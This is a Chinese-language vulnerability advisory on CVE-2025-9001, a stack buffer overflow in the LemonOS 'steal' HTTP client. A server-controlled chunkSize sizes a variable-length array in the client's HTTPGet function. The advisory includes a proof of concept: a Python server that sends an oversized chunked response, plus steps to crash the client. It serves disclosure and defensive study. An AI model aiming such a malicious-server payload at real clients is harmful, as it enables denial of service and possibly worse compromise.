Lemonos HTTP堆栈溢出漏洞CVE-2025-9001

LemonOS是一个基于 C++ 开发的64位操作系统，采用模块化内核设计，支持对称多处理 （ SMP ）、网络堆栈（ TCP/IP 、 DHCP ）。

一、基本情况

LemonOS （ 柠檬操作系统 ）的核心特性包括自研的窗口管理器/合成器 （ LemonWM ）、终端模拟器、音频播放器等，仍持续开发中。

栋科技漏洞库关注到在LemonOS的nightly-2024-07-12版本之前存在一个漏洞，漏洞被追踪为CVE-2025-9001，漏洞的CVSS 4.0评分6.9。

二、漏洞分析

CVE-2025-9001是LemonOS的nightly-2024-07-12版本前的漏洞，影响HTTP客户端组件/Applications/Steal/main.cpp文件HTTPGet函数。

在处理参数chunkSize时，该函数存在栈缓冲区溢出的问题，攻击者可远程利用此漏洞进行攻击，漏洞现已被公开披露，可能被恶意利用。

具体而言，CVE-2025-9001是一个stealHTTP客户端（LemonOS的curl等价物）中的堆栈溢出漏洞。

该漏洞源于HTTPGet函数中使用了可变长度数组（VLA），具体位于main.cpp的第361行，char recieveBuffer[chunkSize];在此处声明。

该chunkSize值由外部HTTP服务器响应控制，允许攻击者通过精确操作触发崩溃或可能升级影响。

三、POC概念验证

1、下载并把以下两个文件放在同一个目录中：

管理员已设置登录后刷新可查看

2、编译代码：

g++ -g -o steal main.cpp -lssl -lcrypto

3、创建一个Python服务器，对任何传入请求返回10MB的数据大小。

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 80))
s.listen(1)

print("Listening on 127.0.0.1:80")
conn, addr = s.accept()
conn.recv(1024)
response = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
chunk_size = 10485760  # 10MB
payload = b"A" * chunk_size
response += f"{hex(chunk_size)[2:]}".encode() + b"\r\n"
response += payload + b"\r\n"
response += b"0\r\n\r\n"
conn.send(response)
conn.close()
s.close()

4、确保安装了Python-3，然后运行此命令：

$ python3 server.py

将此视为一个正常服务器，当用户请求时，提供一个10MB的安装程序。

5、编译steal二进制文件：

g++ -g -o steal main.cpp -lssl -lcrypto

6、通过向服务器发送请求来运行它，使用偷取二进制文件：

./steal "127.0.0.1"

7、这将触发段错误并导致程序崩溃。 

四、影响范围

LemonOS <= nightly-2024-07-12

五、修复建议

未知

六、参考链接

管理员已设置登录后刷新可查看